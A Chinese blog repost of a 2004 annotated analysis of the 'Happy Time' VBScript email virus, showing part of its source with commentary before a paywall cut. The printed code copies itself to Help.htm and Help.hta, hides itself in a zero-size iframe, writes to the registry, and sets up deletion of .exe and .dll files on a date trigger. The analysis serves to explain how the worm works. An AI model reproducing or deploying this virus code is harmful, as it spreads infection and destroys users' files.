欢乐时光病毒原码分析

最新推荐文章于 2023-09-21 16:08:38 发布
原创 最新推荐文章于 2023-09-21 16:08:38 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#function #vbscript #each #shell #html #express

本文详细探讨了欢乐时光病毒的原码,涉及到VBScript的使用,深入解析了其如何利用Each循环、Shell命令及HTML和Express等技术进行传播和影响。通过对这些关键点的分析,揭示了病毒的工作原理。
欢乐时光病毒原码分析
作者:swords
出处: ColorWolf:Swords
性质:转载
发布日期:2004-08-15
 
<script language='VBScript'>
Rem I am sorry! happy time
On Error Resume Next
mload                                ----------------------从mload开始罪恶的历程
Sub mload()                                  
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then                        ----------------------如果本程序是网页,就是在Outlook
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:/Help.htm"               ----------------------建立help.htm
Os.Doc = Lhtml()                      ------------调入全部源码
Os.Write()                            ----------------------存储自身到help.htm
Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "Help.vbs") Then    
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)       ---------调用mclose
main                                ----------------进入主程序
Else
Os.Reset()
Os.Path = mPath & "/" & "Help.hta"        ------------建立Help.hta文件
Os.Doc = Lhtml()
Os.write()
Iv mPath, "Help.hta"
End If
End If
End If
Else
main      
End If
End Sub
Sub main()                                      ----------------主程序
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER/Software/"              -----------------写注册表
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:/help.htm") Then
Of.DeleteFile ("C:/help.htm")
End If
Key = CInt(Month(Date) + Day(Date))             ---------------注意:破坏动作
If Key = 13 Then                                ---------------如果月日之和等于13
Od.RemoveAll
Od.Add "exe", "0001"                            ---------------删除.exe.dll文件
Od.Add "dll", "0001"
End If
最低0.47元/天 解锁文章
软考中级-软件设计师知识点与例题-1、计算机组成与结构
qq_43432057的博客
11-20 1556
计算机组成与结构 计算机基本工作原理 进制: 后缀为H、0X表示的是16进制,B表示二进制数,Q表示八进制数,D表示十进制数。 16进制:09、AF/af(表示1015); 16位数对应进制的表示方法: 10进制 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16进制 0 1 2 3 4 5 6 7 8 9 A B C D E F 2进制 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 10
一、计算机组成与体系——软考软件设计师
i_see_the_world的博客
05-31 935
中央处理单元 CPU功能:程序控制、操作控制、时间控制、数据处理。 多核CPU系统的最大优点(也是开发的最主要的目的)是可满足用户同时进行多任务处理的要求。 计算机硬件:运算器,控制器,存储器,输入设备,输出设备。 计算机硬件:运算器,控制器,存储器,输入设备,输出设备。
[转]“新欢乐时光病毒源代码分析
代码人生
09-21 2538
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() 初始化变量 KJSetDim() 初始化环境 KJCreateMilieu() 感染本地或者共享上与html所在目录 KJLikeIt() 通过vbs感染Outlook邮件模板
浅析欢乐时光(HAPPY TIME)病毒 (转)
circularr9834的博客
08-16 438
浅析欢乐时光(HAPPY TIME)病毒 (转)[@more@]浅析欢乐时光(HAPPY TIME)病毒徐广圻 01-5-11 下午 02:19:25 本人是个上网新手,今年四月份左右才开始上网。新手嘛,可不像高手那样,懂...
"欢乐时光"代码分析
jjdelphi的专栏
07-20 2751
"欢乐时光"代码分析 转自 ==================== “欢乐时光”其实就是利用了超文本邮件中可以夹带脚本语言的特点而棋高一招的。我们知道,邮件的格式可以有两种:纯文本和超文本。超文本(HTML)功能强大就不用多说了,它可以内嵌数种脚本语言,常见的就是VBScript和JavaScript。“欢乐时光”在超文本中夹带的就是VBS。从源代码中可以看得出来,该作者很可能是
浅析欢乐时光(HAPPY TIME)病毒
tchaikov的专栏
05-13 5975
浅析欢乐时光(HAPPY TIME)病毒徐广圻 01-5-11 下午 02:19:25本人是个上网新手,今年四月份左右才开始上网。新手嘛,可不像高手那样,懂得如何使自己的电脑免受网络病毒之害,只使了个瑞星杀毒软件,以为如此一来就万事大吉了。刚开始上网时,简直在五光十色的各网站及信息的海洋中迷了路,东走西瞧,看见感兴趣的网页就保存,遇见有趣的软件即下载
links.php是病毒吗,发现了第一只php病毒PHP.Pirus
weixin_33761747的博客
04-01 207
用php生成excel文件用php生成excel文件哈哈,今天又学一招。php生成excel文档太简单了,估计大家都会用到,所以共享出来。大家来看代码:header("Content-type:application/vnd.ms-excel");header("Content-Disposition:filename=test.xls");echo "test...php编写大型网站问题集php...
计算机病毒
weixin_33704234的博客
06-18 803
计算机病毒病毒定义】 计算机病毒是一个程序,一段可执行码 ,对计算机的正常使用进行破坏,使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就...
软件设计师近10年上午真题解析知识点(并非绝对完整版)
qq_44858224的博客
10-31 2841
2009下半年 计算机硬件组成 1、CPU是计算机的控制中心,它的组成部分:运算器、控制器、寄存器组和内部总线 2、控制器用于协调和指挥整个计算机系统,它的组成部分:程序计数器(PC)、指令寄存器、指令译码器、时序产生器和操作控制器 3、程序寄存器是专用寄存器,具备寄存信息和技术两种功能 指令系统和计算机体系结构 4、CISC(复杂指令集计算机):进一步增强原有指令的功能,用更为复杂的新指令取代原先由软件子程序完成的功能,实现软件功能的硬件化,导致机器的指令系统越来越庞大而复杂 5、RISC(精简指令集计算
欢乐时光病毒专杀或folder.htt 专杀
02-12
欢乐时光病毒专杀 里面有2个杀毒软件 本人用了 好使 不好使 可以联系我 我给杀掉 欢乐时光病毒特征 :folder.htt 等文件夹
欢乐时光病毒查杀专用工具
07-03
瑞星查杀新欢乐时光的专用工具,用于查杀新欢乐时光病毒,测试有效,使用完可以使用everthing软件查出所有病毒文件,一键删除
软件设计师之上午选择题(一)
Hissz的博客
07-13 791
软考之软件设计师上午选择题
欢乐时光
yanghaizi123的专栏
09-15 320
中毒了,叫“欢乐时光”。是一种早期的dos病毒,它会让系统变慢或打不开文件夹。所有的杀毒软件都不查杀他们。清除办法就是:搜索---全部删除。顺便把Thumbs.db也搜索出来,全部清除。“欢乐时光”最容易软盘传播或者u盘传播。请检查你常用的机器,全部删除。 删除后系统会变快,没有不良影响!!!! desktop.ini 是系统配置文件,如果你用的是茄花园的XP系统,肯定就是自定义的硬盘图表,文件...
网页脚本病毒理解与防护
qq_61141142的博客
09-21 2910
一、脚本病毒的背景知识介绍 脚本病毒是指利用.asp、.htm、.html、.vbs、.js类型的文件进行传播的基于VB Script和Java Script脚本语言并由Windows Scripting Host解释执行的这类病毒。 脚本语言的功能非常强大,它们利用Windows系统具有开放性的特点,通过调用一些现成的Windows对象和组件,可以直接对文件系统、注册表等进行控制。脚本病毒正是利用脚本语言的这些特点,通过ActiveX进行网页传播,通过OE的自动发送邮件功能进行邮件传
Delphi CALL函数原码分析与应用
标题和描述都指向了“delphi CALL原码”,这里我们主要需要讨论的是在Delphi编程语言中,与 CALL 指令相关的原码解析。Delphi 是一种强类型、面向对象的编程语言,广泛用于开发Windows平台的应用程序。它从最初的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值